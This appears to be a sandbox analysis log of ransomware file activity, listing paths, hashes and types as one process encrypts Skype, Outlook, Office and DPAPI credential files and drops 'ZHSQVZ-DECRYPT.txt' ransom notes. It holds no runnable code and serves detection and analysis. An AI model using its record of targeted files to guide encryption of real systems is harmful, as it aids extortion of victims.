C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-1-1870167131.blog
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\logs\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog.zhsqvz
binary
MD5: 92629cc9a13e3ff6874f20c256d335ea
SHA256: 996accfc1d4a54b9274d67a78cf4cccd20b1266dc3f715f163bf4688ef0709a7
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\media-stack\Skype.msrtc-0-2576771366.blog
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001.zhsqvz
binary
MD5: 1c87c9f766e83126af1816a876d76e9f
SHA256: 275d59a16a785b253928871b7ab58a1ef647da66f0ca9aeb4359d65f5a667a03
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old.zhsqvz
binary
MD5: 5911f53ee32cffacb0a63797d07d5a3b
SHA256: 531e9e94a03c2d394ea170a1f5ea081d84794ead5ef53489ec1a1a45e045d003
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG.zhsqvz
binary
MD5: 676f0b3f79d31c760923c1898c00f7f7
SHA256: e8d534e36645090a3a395a213fd19c9009eea9bbc2a059fe704795c2bfa122ef
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\LOG
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT.zhsqvz
binary
MD5: b53823ec08a8cdd81b4514b29860522c
SHA256: 890c0acb458e635b8c2930bd9c424c18509c723dd844144205a7d5da77894441
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb.zhsqvz
binary
MD5: bb5ee764aaf8bf3ec9ee1e881c755ea0
SHA256: 8225ac82ec0a39821c5d12867d9850350c7b32fe81513d112286df4fc5d40066
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000018.ldb
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log.zhsqvz
binary
MD5: a162dc2dca619a840e640f6a64770828
SHA256: c5c455e231ada079467389be623cbb37c80925207bc0e2536675df515bcae2da
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000017.log
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb.zhsqvz
binary
MD5: 48125bcfcb9fe0b8ef3ad2bdd04cea45
SHA256: 5ad9c46a2f0c799d5fb27e6a6075787052fb1bdc50c6646419e75797ee581bfa
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Local Storage\leveldb\000005.ldb
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.zhsqvz
binary
MD5: 5634acc91e9ec200206ffed7fd6b1989
SHA256: ba85ad32d00d0ee5af664682094676ab958f283abc53a18d0c2328696f8171b6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old.zhsqvz
binary
MD5: e2eb0ae5c05e3a537651960db2773495
SHA256: c427b49880f13483f226c664bb6e02494abdbbd5102fd68061e790b22ff7f97e
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001.zhsqvz
binary
MD5: c6e889c7cee1ad7b0335c4ecbe29620d
SHA256: ebd4aea2b00ff5e73eb80e7639c4dad53c1d82e1003e6a7eae05a65a50af1e80
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\MANIFEST-000001
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG.old
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\LOG
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT.zhsqvz
binary
MD5: 845d53e2b6f9512829f979679648bc84
SHA256: a2ce1d5f1e7461bc3f782e4c865765c21e3ea86cbe38a0d3ec908890ed09e674
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\CURRENT
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log.zhsqvz
binary
MD5: a4eb61409c78dc9e09bbecdc529c13e9
SHA256: 338b472553c246607dc2acbdda7f67216347470e28d85c5deb0527f7a39fd101
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\000003.log
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\file__0.indexeddb.leveldb\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\IndexedDB\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json.zhsqvz
binary
MD5: ff6c0878c9e3e3180c6ee00bd013d8f2
SHA256: ea75b00557fcb98f18bac4feb4c52720afee985830d4545f0749559bb311c1e3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ecscache.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic.zhsqvz
binary
MD5: 48832afd640404e8ac0ccc2891545144
SHA256: 24885bd6a3c20f77a2205e6cb53bb43206e9bd5c42b841b9f819e8f1485abfcc
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\en-US.bdic
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\dictionaries\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json.zhsqvz
binary
MD5: 60fd58934b7cb34c0d4647dc97a2432d
SHA256: 7c34b87b5e8b3ee0c78e925208f7dd677bdb4658b70b41befbb63163aa8d7a58
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\device-info.json
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db.zhsqvz
binary
MD5: 1638e848876661b434a28fdbfde6dab3
SHA256: 6c33183a65bca451d6558edb9e145459e33b398433b46b43bad4e7fe1d9b89b8
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies.zhsqvz
binary
MD5: f483647fccf960179588466953a5d942
SHA256: fb5b126d8ef0a6b56369c7a4c2f6c1b5a5b62f8daaddd0f8f7c590b74ce0a5a1
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\databases\Databases.db
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cookies
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index.zhsqvz
binary
MD5: 65716affc9f011afd7f78306bc0f5d03
SHA256: 355dbeabf41ca9b18878866db4fab4056234b295e04cb793b5bbacd9a1843816
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\index
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003.zhsqvz
binary
MD5: 4a4b09f1825e5b4f1300b50d9b3c85f3
SHA256: 45d3d8430cb8ded4aad3e8d2743a5a3faca481399231a52f981cb7d5a03da74c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004.zhsqvz
binary
MD5: 2bad594e78b78b530f9da2850ae35607
SHA256: 30b6c5541b77b4e892ab4d78994a86fdfc014336dcd2e73d1fe63a53d528103f
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002.zhsqvz
binary
MD5: 2a346d4fedc61d53aacfad04ab4c84fe
SHA256: 619e1e9b07678c204987346c9db2dfeff05afbaab2ab498f7363fb001b8ae607
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000004
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000003
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000002
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001.zhsqvz
binary
MD5: de72b4abe2638a5e673b031a768ae67d
SHA256: 231cc03c6ec8eb43e3fb87d35dcf1503e261c8958edf7bf6553c1812a7e1dfee
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\f_000001
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3.zhsqvz
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_3
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2.zhsqvz
binary
MD5: 7a57fb8b468f5ea2aae2d9b959196ee4
SHA256: f9d3ad2c77694c3e24634a250bed078877bb07dc9d7f3a1de47c1d66445aedf4
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_2
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1.zhsqvz
binary
MD5: 15ef2529b7073b0ba929e592bbea296b
SHA256: a24e46f24d5962530ff926da67cb2aa839f0937fcb8326599c622d76ab198af3
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_1
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0.zhsqvz
binary
MD5: 45a0c63fa08babde5de67a099b11e440
SHA256: 151e27b4ae10200c1e179a32b622feaa4c364b3d2378a2418c78e3bb7e18a5e0
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Skype for Desktop\Cache\data_0
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml.zhsqvz
binary
MD5: ae34508f1b5e18c2ab364640dacfbfab
SHA256: 2aaa09588d8fb8616abcb592ab3e35e65b330517b4edd63121b95cd88f2ce57b
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Signatures\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred.zhsqvz
binary
MD5: 0ae325764a6db54eb302ca4aee4c680a
SHA256: e051a70a085a04083e33b2f1e3b4254e339380f0362a2863099cf3ec318a6fc2
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Publisher Building Blocks\ContentStore.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\Preferred
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b.zhsqvz
binary
MD5: ecd88da4bd194e0c905ad64bf85df3e4
SHA256: f704a9ae55c42cc7ca035026c7109e5cef025189a3f27cb022585b0d87e5de9c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\60e545a5-2b6a-44ca-95f4-be10be09b981.zhsqvz
binary
MD5: 0d3251389f0c38d587ce505123176f31
SHA256: b3a43e292f2cef5ce024a3ff68b1629c48e2a7e054a0a7b7f4cc83267002372c
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\60e545a5-2b6a-44ca-95f4-be10be09b981
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\54ba308a-6a9a-4e0e-b137-b89d3579498b
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Proof\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8.zhsqvz
binary
MD5: 9d61f17284a78c639f39bf99baf3e9e0
SHA256: 32432581291a647d67bc4698af2b86bbd200342570a26cdc55c8b063efd2ec38
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST.zhsqvz
binary
MD5: a69443e3f7f4e7c5aefbd4b4c133faf2
SHA256: 25e1d5aa51e4e98248c1cb734979c1bfba69fa7dfa5abc8337792186ac6bf865
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\PowerPoint\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\S-1-5-21-1302019708-1500728564-335382590-1000\29fd2168-360f-422a-a685-e6961ea74ba8
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Protect\CREDHIST
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs.zhsqvz
binary
MD5: edd23e7ffaf357ab23800c33d86580ba
SHA256: 9c84febc41d3230e7cb7ef49712f388e423b4749238e7a81da13a56c96d52365
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml.zhsqvz
binary
MD5: 856954eedc2a09edff473f9268a8909e
SHA256: 14edad5595b33e3909cd32a50df8961264c388af40c306bff6130590017613e9
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml.zhsqvz
binary
MD5: 04e49ea39c6088624d59c327db9d0c61
SHA256: b14cb4b8f657b05367807dd89862b8e27c903a245bc613158deaa470a5c885d6
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\test.srs
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs.zhsqvz
binary
MD5: d63c5601873002129f6014c987166168
SHA256: 3d907bfa2a7d2ae0aa03c086ae961d81d76c1d8bb8badfeda8e5fa3fa3c949ef
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml.zhsqvz
binary
MD5: dbff5d34fe54834c4cf8827e4c200671
SHA256: 2794ce2c9026a8abd6b6f50e0a372b6f53bdd3f68cb62c0ad18202064b95a4bb
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\NoMail.xml
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Outlook\Outlook.srs
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat.zhsqvz
binary
MD5: b84730235f240a97471a2827bfbb3975
SHA256: c089a011aea053c46e55b4a8d044ac5ed11efff291d6fffffda8c50ecd8a1a54
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\OneNote\14.0\Preferences.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl.zhsqvz
binary
MD5: 3d53e99c4bf69b0e4fc8299a6d311e91
SHA256: df3160015aa8d6c6f9e0cd8b2ff9d699b2a7a8f8cc523c0b2d68f041647aee4d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\Pbk\_hiddenPbk\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\Connections\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd.zhsqvz
binary
MD5: a43a3b62b71a0a8388b0465c5c0e1997
SHA256: 28ffc54af2305b70ccbbe098fe0da5858e77b368b31c89e06a90bdfaf0c6b203
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Office\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Network\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat.zhsqvz
binary
MD5: b85ba151e21d9d45280f58ecde0b4673
SHA256: 4c43425d427e8812014b19ec54269620d37b84b8bef77872b3c191e60cd31292
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Excel\XLSTART\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx.zhsqvz
binary
MD5: 5aeb938920289abde9983e9701ba3e78
SHA256: 35e6b8da6ea38ca4758e6fac2ba02c4d5349152ae22b6b5c21138b2db2e1da22
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
––
MD5:  ––
SHA256:  ––
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
C:\Users\admin\AppData\Roaming\Microsoft\Document Building Blocks\ZHSQVZ-DECRYPT.txt
text
MD5: f28c4e7d8fc6a81dbbe8f75c49b8257b
SHA256: 7366a68d646a504e3de2e2494c4494b848a05d53f5231720e017b01dcecd8c0d
2180
3468116065.exe
